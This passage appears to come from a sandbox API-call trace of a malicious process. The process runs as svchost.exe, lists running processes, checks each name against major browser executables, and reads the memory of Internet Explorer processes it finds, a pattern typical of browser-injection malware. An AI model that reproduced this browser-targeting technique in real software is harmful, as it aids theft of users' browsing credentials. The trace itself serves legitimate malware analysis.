	[0244.919] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0244.919] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x9108
	[0244.919] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.919] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0244.920] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.920] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.923] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.923] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0244.923] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.923] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.924] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0244.925] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x910c
	[0244.925] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.925] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0244.925] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.925] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.926] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.926] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0244.926] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.926] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.927] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0244.927] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x9110
	[0244.927] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.927] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0244.928] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.928] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.929] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.929] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0244.929] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.929] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.930] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0244.931] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x9114
	[0244.931] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.931] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0244.931] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.931] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.932] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.932] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0244.932] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.932] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.933] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0244.933] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x9118
	[0244.933] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.934] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0244.934] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.934] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0244.934] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.934] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0244.934] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.934] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.935] NtQueryInformationProcess (in: ProcessHandle=0x9118, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0244.935] ReadProcessMemory (in: hProcess=0x9118, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0244.935] ReadProcessMemory (in: hProcess=0x9118, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0244.935] ReadProcessMemory (in: hProcess=0x9118, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0244.935] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0244.935] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0244.937] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x911c
	[0244.937] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.937] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0244.938] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.938] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0244.938] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.938] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0244.938] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.938] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.938] NtQueryInformationProcess (in: ProcessHandle=0x911c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0244.939] ReadProcessMemory (in: hProcess=0x911c, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0244.939] ReadProcessMemory (in: hProcess=0x911c, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0244.939] ReadProcessMemory (in: hProcess=0x911c, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0244.939] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0244.939] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0244.940] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x9120
	[0244.940] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.940] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0244.940] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.940] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.941] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.941] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0244.941] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.941] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.941] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0244.942] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x9124
	[0244.942] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.942] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0244.942] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.943] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.943] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.943] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0244.943] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.943] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.943] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.944] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x9128
	[0244.944] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.944] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.945] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.945] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.945] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.945] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.945] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.945] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.946] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.946] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.947] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x912c
	[0244.947] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.947] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.948] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.948] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.948] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.948] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.948] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.948] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.949] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.949] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x9130
	[0244.949] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.949] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.950] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.950] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.950] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.950] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.950] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.950] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.951] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0244.951] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x9134
	[0244.951] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.952] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0244.952] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.952] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.953] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.953] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0244.953] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.953] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.953] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.954] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x9138
	[0244.954] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.954] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.955] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.955] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.955] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.955] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.955] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.955] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.955] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.956] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x913c
	[0244.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.957] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.957] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.957] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.958] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.958] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.958] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0244.958] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0x9140
	[0244.959] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.959] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0244.959] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.959] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.959] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.959] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0244.959] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.959] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.960] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0244.960] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0x9144
	[0244.960] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.960] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.961] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.961] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.961] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.961] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.961] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.961] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.962] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0244.962] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0x9148
	[0244.963] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.963] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0244.963] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.963] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.963] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.963] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0244.963] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.963] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.963] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.964] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0x914c
	[0244.964] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.964] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.965] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.965] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.965] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.965] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.965] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.965] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.966] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0244.966] CloseHandle (hObject=0x4fd0) returned 1
	[0244.966] Sleep (dwMilliseconds=0x64) 
	[0245.088] GetCurrentProcessId () returned 0x110
	[0245.088] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0245.091] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0245.091] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0245.093] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0245.093] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x9150
	[0245.094] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.094] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0245.094] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.094] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.094] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.094] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0245.094] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.094] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.095] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0245.095] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x9154
	[0245.095] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.095] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0245.096] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.096] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.096] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.096] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0245.096] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.096] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.097] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0245.097] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x9158
	[0245.097] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.097] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0245.098] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.098] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.098] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.098] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0245.098] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.098] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.099] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0245.099] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x915c
	[0245.100] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
